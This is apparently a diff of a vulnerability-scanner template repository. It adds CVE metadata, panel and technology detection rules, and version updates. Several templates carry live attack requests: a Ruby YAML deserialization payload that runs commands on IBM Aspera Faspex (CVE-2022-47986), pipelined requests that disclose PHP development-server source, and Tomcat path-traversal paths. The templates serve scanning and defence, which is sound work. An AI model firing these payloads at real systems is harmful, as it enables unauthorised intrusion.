{"ID":"CVE-2022-43018","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the email parameter in the Check Email function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-43018.yaml"}
{"ID":"CVE-2022-44877","Info":{"Name":"Centos Web Panel - Unauthenticated Remote Code Execution","Severity":"critical","Description":"RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-44877.yaml"}
{"ID":"CVE-2022-45362","Info":{"Name":"Paytm Payment Gateway Plugin \u003c= 2.7.0 Server Side Request Forgery (SSRF)","Severity":"high","Description":"Server Side Request Forgery (SSRF) vulnerability in WordPress Paytm Payment Gateway Plugin. This could allow a malicious actor to cause a website to execute website requests to an arbitrary domain of the attacker. This could allow a malicious actor to find sensitive information.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-45362.yaml"}
{"ID":"CVE-2022-45917","Info":{"Name":"ILIAS eLearning platform \u003c= 7.15 - Open Redirect","Severity":"medium","Description":"ILIAS before 7.16 has an Open Redirect\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-45917.yaml"}
{"ID":"CVE-2022-45933","Info":{"Name":"KubeView - Information disclosure","Severity":"critical","Description":"KubeView through 0.1.31 allows attackers to obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication, and retrieves certificate files that can be used for authentication as kube-admin. NOTE: the vendor's position is that KubeView was a \"fun side project and a learning exercise,\" and not \"very secure.\"\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-45933.yaml"}
{"ID":"CVE-2022-46169","Info":{"Name":"Cacti \u003c= 1.2.22 Unauthenticated Command Injection","Severity":"critical","Description":"The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-46169.yaml"}
{"ID":"CVE-2022-46381","Info":{"Name":"Certain Linear eMerge E3-Series - Cross Site Scripting","Severity":"medium","Description":"Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-46381.yaml"}
{"ID":"CVE-2022-46381","Info":{"Name":"Linear eMerge E3-Series - Cross-Site Scripting","Severity":"medium","Description":"Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-46381.yaml"}
{"ID":"CVE-2022-47945","Info":{"Name":"Thinkphp Lang - Local File Inclusion","Severity":"critical","Description":"ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47945.yaml"}
{"ID":"CVE-2022-47966","Info":{"Name":"ManageEngine - Remote Command Execution","Severity":"critical","Description":"Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47966.yaml"}

View File

@ -11,7 +11,7 @@ info:
- http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-20470
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-20470
cwe-id: CWE-22

View File

@ -11,7 +11,7 @@ info:
- http://packetstormsecurity.com/files/163398/Pallets-Werkzeug-0.15.4-Path-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-14322
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-14322
cwe-id: CWE-22

View File

@ -11,7 +11,7 @@ info:
- https://extensions.joomla.org/extension/je-messenger/
- https://nvd.nist.gov/vuln/detail/CVE-2019-9922
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-9922
cwe-id: CWE-22

View File

@ -21,7 +21,6 @@ info:
shodan-query: title:"Grafana"
tags: cve,cve2020,xss,grafana,hackerone
requests:
- raw:
- |

View File

@ -14,7 +14,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-21587
tags: cve,cve2022,rce,oast,intrusive,oracle,ebs,unauth
tags: cve,cve2022,rce,oast,intrusive,oracle,ebs,unauth,kev
requests:
- raw:

View File

@ -17,7 +17,6 @@ info:
cwe-id: CWE-77
metadata:
shodan-query: title:"Spark Master at"
cve-id: CVE-2022-33891
verified: "true"
tags: packetstorm,cve,cve2022,apache,spark,authenticated

View File

@ -10,7 +10,6 @@ info:
- https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768
- https://cve.report/CVE-2022-3768
- https://nvd.nist.gov/vuln/detail/CVE-2022-3768
remediation: Fixed in version 1.3.12.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

View File

@ -6,11 +6,11 @@ info:
severity: medium
description: |
WordPress WP-Ban plugin before 1.69.1 contains a stored cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, which can allow high-privilege users to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be exploited even when the unfiltered_html capability is disallowed, for example in multisite setup.
remediation: Fixed in version 1.69.1.
reference:
- https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260
- https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk
remediation: Fixed in version 1.69.1
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8

View File

@ -16,8 +16,8 @@ info:
cve-id: CVE-2022-46381
cwe-id: CWE-79
metadata:
shodan-query: http.html:"Linear eMerge"
verified: "true"
shodan-query: http.html:"Linear eMerge"
tags: cve,cve2022,xss,emerge,linear
requests:

View File

@ -0,0 +1,45 @@
id: CVE-2022-47986
info:
name: Pre-Auth RCE in Aspera Faspex
author: coldfish
severity: critical
description: |
IBM Aspera Faspex could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2.
reference:
- https://blog.assetnote.io/2023/02/02/pre-auth-rce-aspera-faspex/
- https://www.ibm.com/support/pages/node/6952319
remediation: This vulnerability can be remediated by either upgrading to Faspex 4.4.2 Patch Level 2 or Faspex 5.x which does not contain this vulnerability.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-47986
metadata:
verified: "true"
shodan-query: html:"Aspera Faspex"
tags: cve,cve2022,ibm,aspera,faspex
requests:
- raw:
- |
POST /aspera/faspex/package_relay/relay_package HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/json
{"package_file_list": ["/"], "external_emails": "\n---\n- !ruby/object:Gem::Installer\n i: x\n- !ruby/object:Gem::SpecFetcher\n i: y\n- !ruby/object:Gem::Requirement\n requirements:\n !ruby/object:Gem::Package::TarReader\n io: &1 !ruby/object:Net::BufferedIO\n io: &1 !ruby/object:Gem::Package::TarReader::Entry\n read: 0\n header: \"pew\"\n debug_output: &1 !ruby/object:Net::WriteAdapter\n socket: &1 !ruby/object:PrettyPrint\n output: !ruby/object:Net::WriteAdapter\n socket: &1 !ruby/module \"Kernel\"\n method_id: :eval\n newline: \"throw `id`\"\n buffer: {}\n group_stack:\n - !ruby/object:PrettyPrint::Group\n break: true\n method_id: :breakable\n", "package_name": "{{rand_base(4)}}", "package_note": "{{randstr}}", "original_sender_name": "{{randstr}}", "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "metadata_human_readable": "Yes", "forward": "pew", "metadata_json": "{}", "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "delivery_sender_name": "{{rand_base(8)}}", "delivery_title": "{{rand_base(4)}}", "delivery_note": "{{rand_base(4)}}", "delete_after_download": true, "delete_after_download_condition": "IDK"}
matchers-condition: and
matchers:
- type: regex
regex:
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 500

View File

@ -40,6 +40,7 @@ dns:
- "redis.cache.windows.net"
- "search.windows.net"
- "servicebus.windows.net"
- "trafficmanager.net"
- "visualstudio.com"
- type: word

22
dns/dmarc-detect.yaml Normal file
View File

@ -0,0 +1,22 @@
id: dmarc-detect
info:
name: DNS DMARC Detection
author: juliosmelo
severity: info
description: |
DMARC is an open email authentication protocol that provides domain-level protection of the email channel. DMARC authentication detects and prevents email spoofing techniques used in phishing, business email compromise (BEC) and other email-based attacks.
reference:
- https://dmarc.org/
- https://dmarc.org/wiki/FAQ#Why_is_DMARC_important.3F
tags: dns,dmarc
dns:
- name: "_dmarc.{{FQDN}}"
type: TXT
extractors:
- type: regex
group: 1
regex:
- "IN\tTXT\t(.+)"

View File

@ -0,0 +1,26 @@
id: caton-network-manager-system
info:
name: Caton Network Manager System
author: pussycat0x
severity: info
metadata:
verified: "true"
shodan-query: http.title:"Caton Network Manager System"
tags: caton,manager,login,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Caton Network Manager System"
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: ewm-manager-panel
info:
name: EWM Manager Panel
author: pussycat0x
severity: info
metadata:
verified: true
shodan-query: http.title:"EWM Manager"
tags: ewm,manager,login,panel
requests:
- method: GET
path:
- "{{BaseURL}}/wfc/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<TITLE>EWM Manager"
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- "EWM Manager ([0-9.]+)"

View File

@ -0,0 +1,33 @@
id: exagrid-manager-panel
info:
name: ExaGrid Manager Panel
author: pussycat0x
severity: info
metadata:
verified: true
shodan-query: title:"ExaGrid Manager"
tags: exagrid,manager,login,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "ExaGrid Manager"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -2,7 +2,7 @@ id: lucee-login
info:
name: Lucee Web and Lucee Server Admin Login Panel - Detect
author: dhiyaneshDK
author: dhiyaneshDK,unp4ck
severity: info
description: Lucee admin login panels were detected in both Web and Server tabs.
classification:
@ -25,6 +25,11 @@ requests:
words:
- '<title>Login - Lucee Web Administrator</title>'
- '<title>Login - Lucee Server Administrator</title>'
- "lucee-admin-search-input"
- "lucee-docs-search-input"
- "server-lucee-small.png.cfm"
condition: or
- type: status
status:
- 200

View File

@ -0,0 +1,26 @@
id: powercom-network-manager
info:
name: PowerCom Network Manager
author: pussycat0x
severity: info
metadata:
verified: true
shodan-query: http.title:"PowerCom Network Manager"
tags: powercommanager,login,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PowerCom Network Manager"
- type: status
status:
- 200

View File

@ -0,0 +1,28 @@
id: redis-enterprise-panel
info:
name: Redis Enterprise - Detect
author: tess
severity: info
metadata:
verified: "true"
shodan-query: title:"Enterprise-Class Redis for Developers"
tags: panel,redis,enterprise
requests:
- method: GET
path:
- "{{BaseURL}}/#/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Enterprise-Class Redis for Developers'
- 'cm/config/environment'
condition: and
- type: status
status:
- 200

View File

@ -1,7 +1,7 @@
id: server-backup-manager-se
info:
name: Server Backup Manager SE Login Panel - Detect
name: Server Backup Manager SE Panel - Detect
author: dhiyaneshDK
severity: info
description: Server Backup Manager SE login panel was detected.
@ -11,7 +11,7 @@ info:
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Server Backup Manager SE"
tags: panel
tags: panel,server,backup,manager
requests:
- method: GET
@ -20,9 +20,11 @@ requests:
matchers-condition: and
matchers:
- type: word
words:
- '<title>Server Backup Manager SE </title>'
- type: regex
part: body
regex:
- "<title>.*(Server Backup Manager SE).*</title>"
- type: status
status:
- 200

View File

@ -0,0 +1,28 @@
id: sevone-nms-network-manager
info:
name: SevOne NMS Network Manager
author: pussycat0x
severity: info
metadata:
verified: "true"
shodan-query: http.title:"SevOne NMS - Network Manager"
tags: sevone,manager,login,panel
requests:
- method: GET
path:
- "{{BaseURL}}/#login"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SevOne NMS - Network Manager"
- type: status
status:
- 200

View File

@ -5,6 +5,9 @@ info:
author: schniggie,StreetOfHackerR007
severity: info
description: Traefik Dashboard panel was detected.
metadata:
verified: true
shodan-query: http.title:"traefik"
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0

View File

@ -30,6 +30,7 @@ requests:
- "{{BaseURL}}/plugin/editor/ckeditor/samples/old/replacebyclass.html"
- "{{BaseURL}}/latest/samples/old/replacebyclass.html"
- "{{BaseURL}}/Content/ckeditor/samples/old/replacebyclass.html"
- "{{BaseURL}}/ckeditor/samples/plugins/htmlwriter/outputhtml.html"
matchers:
- type: word

View File

@ -0,0 +1,28 @@
id: accueil-wampserver
info:
name: Accueil WAMPSERVER Configuration Page
author: tess
severity: low
metadata:
verified: true
shodan-query: http.title:"Accueil WAMPSERVER"
tags: exposure,accueil,wampserver,config
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Accueil WAMPSERVER"
- "Configuration Serveur"
condition: and
- type: status
status:
- 200

View File

@ -14,7 +14,7 @@ requests:
path:
- "{{BaseURL}}/secret_token.rb"
- "{{BaseURL}}/config/initializers/secret_token.rb"
- "{BaseURL}}/redmine/config/initializers/secret_token.rb"
- "{{BaseURL}}/redmine/config/initializers/secret_token.rb"
stop-at-first-match: true
matchers-condition: and

View File

@ -5,6 +5,7 @@ agenty-flowcharting-panel
aidanmountford-html-panel
akumuli-datasource
alertlist
alertmanager
alexanderzobnin-zabbix-app
alexandra-trackmap-panel
andig-darksky-datasource
@ -12,33 +13,45 @@ annolist
anodot-datasource
anodot-panel
aquaqanalytics-kdbadaptor-datasource
aquaqanalytics-kdbbackend-datasource
auxmoney-waterfall-panel
aws-datasource-provisioner-app
ayoungprogrammer-finance-datasource
barchart
bargauge
belugacdn-app
bessler-pictureit-panel
bilibala-echarts-panel
blackcowmoo-googleanalytics-datasource
blackmirror1-singlestat-math-panel
blackmirror1-statusbygroup-panel
bmchelix-ade-datasource
boazreicher-mosaicplot-panel
boazreicher-sierraplot-panel
bosun-app
briangann-datatable-panel
briangann-gauge-panel
bsull-console-datasource
bsull-materialize-datasource
camptocamp-prometheus-alertmanager-datasource
candlestick
canvas
ccin2p3-riemann-datasource
chaosmeshorg-datasource
citilogics-geoloop-panel
clarity89-finnhub-datasource
cloudflare-app
cloudspout-button-panel
cloudwatch
cognitedata-datasource
computest-cloudwatchalarm-datasource
corpglory-chartwerk-panel
corpglory-progresslist-panel
dalmatinerdb-datasource
dalvany-image-panel
dashlist
ddurieux-glpi-app
debug
devicehive-devicehive-datasource
devopsprodigy-kubegraf-app
digiapulssi-breadcrumb-panel
@ -47,6 +60,9 @@ digrich-bubblechart-panel
dlopes7-appdynamics-datasource
doitintl-bigquery-datasource
elasticsearch
embraceio-metric-app
esnet-chord-panel
esnet-matrix-panel
factry-untimely-panel
farski-blendstat-panel
fastweb-openfalcon-datasource
@ -56,6 +72,7 @@ fifemon-graphql-datasource
flaminggoat-maptrack3d-panel
flant-statusmap-panel
foursquare-clouderamanager-datasource
foursquare-studio-panel
frser-sqlite-datasource
fzakaria-simple-annotations-datasource
gapit-htmlgraphics-panel
@ -63,15 +80,21 @@ gauge
geomap
gettingstarted
gnocchixyz-gnocchi-datasource
golioth-websocket-datasource
goshposh-metaqueries-datasource
gowee-traceroutemap-panel
grafadruid-druid-datasource
grafana-astradb-datasource
grafana-athena-datasource
grafana-azure-data-explorer-datasource
grafana-azure-monitor-datasource
grafana-azuredevops-datasource
grafana-bigquery-datasource
grafana-clickhouse-datasource
grafana-clock-panel
grafana-databricks-datasource
grafana-datadog-datasource
grafana-db2-datasource
grafana-discourse-datasource
grafana-dynatrace-datasource
grafana-enterprise-logs-app
@ -86,14 +109,20 @@ grafana-image-renderer
grafana-iot-sitewise-datasource
grafana-iot-twinmaker-app
grafana-jira-datasource
grafana-k6-app
grafana-k6cloud-datasource
grafana-kairosdb-datasource
grafana-metrics-enterprise-app
grafana-mock-datasource
grafana-mongodb-datasource
grafana-mqtt-datasource
grafana-newrelic-datasource
grafana-odbc-datasource
grafana-oncall-app
grafana-opcua-datasource
grafana-opensearch-datasource
grafana-oracle-datasource
grafana-orbit-datasource
grafana-piechart-panel
grafana-polystat-panel
grafana-redshift-datasource
@ -119,8 +148,11 @@ gridprotectionalliance-openhistorian-datasource
gridprotectionalliance-osisoftpi-datasource
groonga-datasource
hadesarchitect-cassandra-datasource
hamedkarbasi93-kafka-datasource
hamedkarbasi93-nodegraphapi-datasource
hawkular-datasource
heatmap
heatmap-new
histogram
humio-datasource
ibm-apm-datasource
@ -129,13 +161,20 @@ innius-grpc-datasource
innius-video-panel
instana-datasource
integrationmatters-comparison-panel
iosb-sensorthings-datasource
isaozler-paretochart-panel
isaozler-shiftselector-panel
itrs-hub-datasource
itrs-obcerv-datasource
jaeger
jasonlashua-prtg-datasource
jdbranham-diagram-panel
jeanbaptistewatenberg-percent-panel
kentik-connect-app
kniepdennis-neo4j-datasource
knightss27-weathermap-panel
larona-epict-panel
lework-lenav-panel
lightstep-metrics-datasource
linksmart-hds-datasource
linksmart-sensorthings-datasource
@ -153,6 +192,7 @@ marcusolsson-hourly-heatmap-panel
marcusolsson-json-datasource
marcusolsson-static-datasource
marcusolsson-treemap-panel
marcusolsson-ynab-datasource
meteostat-meteostat-datasource
michaeldmoore-annunciator-panel
michaeldmoore-multistat-panel
@ -166,13 +206,18 @@ mtanda-heatmap-epoch-panel
mtanda-histogram-panel
mxswat-separator-panel
mysql
nagasudhirpulla-api-datasource
natel-discrete-panel
natel-influx-admin-panel
natel-plotly-panel
natel-usgs-datasource
neocat-cal-heatmap-panel
netsage-bumpchart-panel
netsage-sankey-panel
netsage-slopegraph-panel
news
nikosc-percenttrend-panel
nline-plotlyjs-panel
nodeGraph
novalabs-annotations-panel
novatec-sdg-panel
@ -181,10 +226,19 @@ oci-logs-datasource
oci-metrics-datasource
opennms-helm-app
opentsdb
orchestracities-iconstat-panel
orchestracities-map-panel
ovh-warp10-datasource
parca-datasource
parca-panel
parseable-parseable-datasource
paytm-kapacitor-datasource
percona-percona-app
performancecopilot-pcp-app
petrslavotinek-carpetplot-panel
pgillich-tree-panel
pgollangi-firestore-datasource
philipsgis-phlowchart-panel
piechart
pierosavi-imageit-panel
pixie-pixie-datasource
@ -209,6 +263,8 @@ savantly-heatmap-panel
sbueringer-consul-datasource
scadavis-synoptic-panel
sebastiangunreben-cdf-panel
sentinelone-dataset-datasource
shorelinesoftware-shoreline-datasource
sidewinder-datasource
simpod-json-datasource
singlestat
@ -230,8 +286,10 @@ state-timeline
status
status-histor
streamr-datasource
svennergr-hackerone-datasource
table
table-old
tdengine-datasource
teamviewer-datasource
tempo
tencentcloud-monitor-app
@ -240,20 +298,28 @@ text
thalysantana-appcenter-datasource
thiagoarrais-matomotracking-panel
timeseries
timomyl-breadcrumb-panel
timomyl-organisations-panel
udoprog-heroic-datasource
ventura-psychrometric-panel
vertamedia-clickhouse-datasource
vertica-grafana-datasource
verticle-flowhook-datasource
volkovlabs-echarts-panel
volkovlabs-form-panel
volkovlabs-image-panel
volkovlabs-rss-datasource
vonage-status-panel
voxter-app
welcome
williamvenner-timepickerbuttons-panel
woutervh-mapbox-panel
xginn8-pagerduty-datasource
xychart
yesoreyeram-boomtable-panel
yesoreyeram-boomtheme-panel
yesoreyeram-infinity-datasource
yeya24-chaosmesh-datasource
zestairlove-compacthostmap-panel
zipkin
zuburqan-parity-report-panel

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

View File

@ -1 +1 @@
2.7.23
2.7.24

View File

@ -1 +1 @@
4.2.9
4.3.0

View File

@ -1 +1 @@
1.5.2
1.5.2.1

View File

@ -1 +1 @@
3.10.1
3.10.2

View File

@ -1 +1 @@
3.0.8
3.0.9

View File

@ -1 +1 @@
4.3.22
4.3.24

View File

@ -1 +1 @@
5.5.6
5.5.7

View File

@ -1 +1 @@
1.92.0
1.93.0

View File

@ -1 +1 @@
2.9.14
2.9.15

View File

@ -1 +1 @@
2.1
2.1.1

View File

@ -1 +1 @@
4.5.2
4.6.0

View File

@ -1 +1 @@
4.86
4.87

View File

@ -1 +1 @@
3.1
3.1.1

View File

@ -1 +1 @@
5.6.15
5.6.16

View File

@ -1 +1 @@
7.5.9
7.6.0

View File

@ -1 +1 @@
3.33
3.35

View File

@ -1 +1 @@
2.1.1
2.1.2

View File

@ -1 +1 @@
2.11.2
2.12.1

View File

@ -1 +1 @@
1.8.11
1.8.12

View File

@ -1 +1 @@
4.9.47
4.9.48

View File

@ -1 +1 @@
3.3.1
3.3.2

View File

@ -1 +1 @@
4.3.24
4.3.26

View File

@ -1 +1 @@
1.0.107.2
1.0.107.3

View File

@ -1 +1 @@
1.46.3
1.46.5

View File

@ -1 +1 @@
6.2.98
6.3.01

View File

@ -1 +1 @@
5.6.4
5.7.1

View File

@ -1 +1 @@
5.3.0
5.4.0

View File

@ -1 +1 @@
2.0.1
2.0.2

View File

@ -1 +1 @@
2.2.1
2.2.2

View File

@ -1 +1 @@
2.6.0
2.6.1

View File

@ -1 +1 @@
13.2.15
13.2.16

View File

@ -1 +1 @@
1.9.2
1.9.3

View File

@ -1 +1 @@
4.5.5
4.6.0

View File

@ -1 +1 @@
1.9.7
1.9.8

View File

@ -1,7 +1,7 @@
id: hp-device-info-detect
info:
name: HP LaserJet
name: HP Device Info Detection
author: pussycat0x
severity: low
reference: https://www.exploit-db.com/ghdb/6905

27
iot/loytec-device.yaml Normal file
View File

@ -0,0 +1,27 @@
id: loytec-device
info:
name: Loytec Device Info Detection
author: pussycat0x
severity: info
metadata:
verified: "true"
shodan-query: "loytec"
tags: iot,loytec
requests:
- method: GET
path:
- "{{BaseURL}}/webui/device_info/device_info"
matchers-condition: and
matchers:
- type: word
words:
- 'device_info'
- 'syslog'
condition: and
- type: status
status:
- 200

23
iot/ulanzi-clock.yaml Normal file
View File

@ -0,0 +1,23 @@
id: ulanzi-clock
info:
name: Ulanzi Clock Detect
author: fabaff
severity: info
tags: panel,ulanzi,iot
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Ulanzi Clock</title>'
- type: status
status:
- 200

View File

@ -16,7 +16,9 @@ requests:
- method: GET
path:
- '{{BaseURL}}/..;/manager/html'
- '{{BaseURL}}/..;/..;/manager/html;/'
- '{{BaseURL}}/..;/host-manager/html'
- '{{BaseURL}}/..;/..;/host-manager/html;/'
- '{{BaseURL}}/{{randstr}}/..;/manager/html'
- '{{BaseURL}}/{{randstr}}/..;/host-manager/html'

View File

@ -0,0 +1,39 @@
id: php-src-diclosure
info:
name: PHP Development Server <= 7.4.21 - Remote Source Disclosure
author: pdteam
severity: high
description: |
A source code disclosure vulnerability in a web server caused by improper handling of multiple requests in quick succession, leading to the server treating requested files as static files instead of executing scripts.
reference:
- https://blog.projectdiscovery.io/php-http-server-source-disclosure/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-540
tags: php,phpcli,diclosure
requests:
- raw:
- |+
GET / HTTP/1.1
Host: {{Hostname}}
GET /{{rand_base(3)}}.{{rand_base(2)}} HTTP/1.1
- |+
GET / HTTP/1.1
Host: {{Hostname}}
unsafe: true
matchers:
- type: dsl
dsl:
- 'contains(body_1, "<?php")'
- '!contains(body_2, "<?php")'
condition: and

View File

@ -0,0 +1,28 @@
id: setup-github-enterprise
info:
name: Setup GitHub Enterprise - Detect
author: tess
severity: unknown
metadata:
verified: true
shodan-query: http.favicon.hash:-1373456171
tags: panel,exposure,setup,github
requests:
- method: GET
path:
- '{{BaseURL}}/setup/start'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Setup GitHub Enterprise"
- "Install GitHub Enterprise"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,33 @@
id: transmission-dashboard
info:
name: Transmission Dashboard Exposure
author: fabaff
severity: medium
reference:
- https://transmissionbt.com/
metadata:
verified: true
shodan-query: http.title:"Transmission Web Interface"
tags: misconfig,transmission,exposure,dashboard
requests:
- method: GET
path:
- "{{BaseURL}}/transmission/web/"
host-redirects: true
max-redirects: 2
matchers-condition: or
matchers:
- type: word
part: body
words:
- 'The Transmission Project'
- 'Transmission Web Interface'
condition: and
- type: word
part: server
words:
- 'Transmission'

View File

@ -0,0 +1,26 @@
id: unauth-axyom-network-manager
info:
name: Unauthenticated Axyom Network Manager
author: pussycat0x
severity: high
metadata:
verified: true
shodan-query: http.title:"Axyom Network Manager"
tags: misconfig,axyom,exposure,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/home"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Axyom Network Manager'
- type: status
status:
- 200

View File

@ -0,0 +1,37 @@
id: mongodb-info-enum
info:
name: MongoDB Information Enumeration
author: pussycat0x
severity: info
description: |
MongoDB is an open source NoSQL database management program. NoSQL is used as an alternative to traditional relational databases.
reference:
- https://nmap.org/nsedoc/scripts/mongodb-info.html
metadata:
verified: "true"
shodan-query: mongodb server information
tags: network,mongodb,enum
network:
- inputs:
- data: 3b0000003c300000ffffffffd40700000000000061646d696e2e24636d640000000000ffffffff14000000106275696c64696e666f000100000000
type: hex
host:
- "{{Hostname}}"
- "{{Host}}:27017"
read-size: 2048
matchers:
- type: word
part: raw
words:
- "version"
- "maxBsonObjectSize"
condition: and
extractors:
- type: regex
regex:
- "([A-Za-z:0-9.]+)"

View File

@ -21,6 +21,7 @@ network:
- "{{Host}}:21"
- "{{Hostname}}"
matchers-condition: and
matchers:
- type: word
part: raw
@ -29,3 +30,9 @@ network:
- "Logged in anonymously"
- "230"
condition: or
- type: word
part: raw
words:
- "HTTP/1.1"
negative: true

View File

@ -27,3 +27,8 @@ requests:
dsl:
- contains(tolower(all_headers), 'x-guploader-uploadid')
negative: true
- type: word
part: host
words:
- "amazonaws.com"

View File

@ -0,0 +1,26 @@
id: connectwise-control-detect
info:
name: ConnectWise Control Detect
author: pikpikcu
severity: info
metadata:
verified: true
shodan-query: title="ConnectWise Control Remote Support Software"
tags: tech,connectwise
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "ConnectWise Control Remote Support Software"
- type: status
status:
- 200

View File

@ -715,15 +715,17 @@ requests:
- axis2-admin
- axis2-web
- type: word
part: header
name: apache-cocoon
- type: word
name: apache-druid
words:
- content="Apache Druid console"
- type: word
part: header
name: apache-cocoon
words:
- "X-Cocoon-Version"
- type: word
name: apache-flink
words:
@ -787,11 +789,8 @@ requests:
name: apache-kylin
words:
- <meta http-equiv="refresh" content="1;url=kylin">
- type: word
name: apache-kylin
words:
- href="/kylin/"
condition: or
- type: word
name: apache-mesos
@ -14392,13 +14391,6 @@ requests:
words:
- 神盾fs<sup>3</sup>文档安全共享系统v2.0</div>
- type: word
condition: and
name: yapi
words:
- YApi
- 可视化接口管理平台
